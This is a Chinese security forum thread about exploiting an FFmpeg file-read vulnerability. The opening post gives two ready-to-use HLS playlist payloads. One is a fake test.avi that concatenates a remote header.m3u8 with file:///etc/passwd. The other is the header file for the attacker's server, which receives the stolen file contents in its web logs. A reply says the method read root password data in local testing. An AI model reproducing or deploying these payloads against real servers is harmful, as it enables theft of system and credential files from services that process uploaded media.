请选择 进入手机版 | 继续访问电脑版
查看: 1991|回复: 2

FFmpeg文件读取漏洞测试及利用

[复制链接]
  • TA的每日心情
    慵懒
    2017-4-9 19:10
  • 签到天数: 149 天

    [LV.7]常住居民III

    发表于 2016-6-20 21:56:05 | 显示全部楼层 |阅读模式
    本帖最后由 人=族 于 2016-6-20 21:57 编辑

    看了老外写的文章,大概理解的利用方式如下:

    #EXTM3U
    #EXT-X-MEDIA-SEQUENCE:0
    #EXTINF:10.0,
    concat:http://www.nxadmin.com/header.m3u8|file:///etc/passwd
    #EXT-X-ENDLIST
    以上内容保存成test.avi,是用来上传到被攻击服务器的。

    #EXTM3U
    #EXT-X-MEDIA-SEQUENCE:0
    #EXTINF:,
    http://www.nxadmin.com?
    以上内容保存成header.m3u8,将header.m3u8上传到你的服务器,然后把test.avi上传到攻击服务器,如果有漏洞,会收到如下的日志:









    会收到三条日志记录,第一条是请求header.m3u8文件的,第三条中就包含了读取的部分文件内容,说明是存在此漏洞的。

    header.m3u8文件的内容大概是将让你的web产生日志并且传回读取的文件内容。

    经历过ImageMagick命令执行漏洞的洗礼之后,又有FFmpeg文件读取漏洞
                      
    回复

    使用道具 举报

  • TA的每日心情

    前天 19:07
  • 签到天数: 928 天

    [LV.10]以坛为家III

    发表于 2016-6-21 13:16:39 | 显示全部楼层
    普通权限也阔以?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-4-9 19:10
  • 签到天数: 149 天

    [LV.7]常住居民III

     楼主| 发表于 2016-6-22 09:57:24 | 显示全部楼层
    本地测试的可以读取 、root密码
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表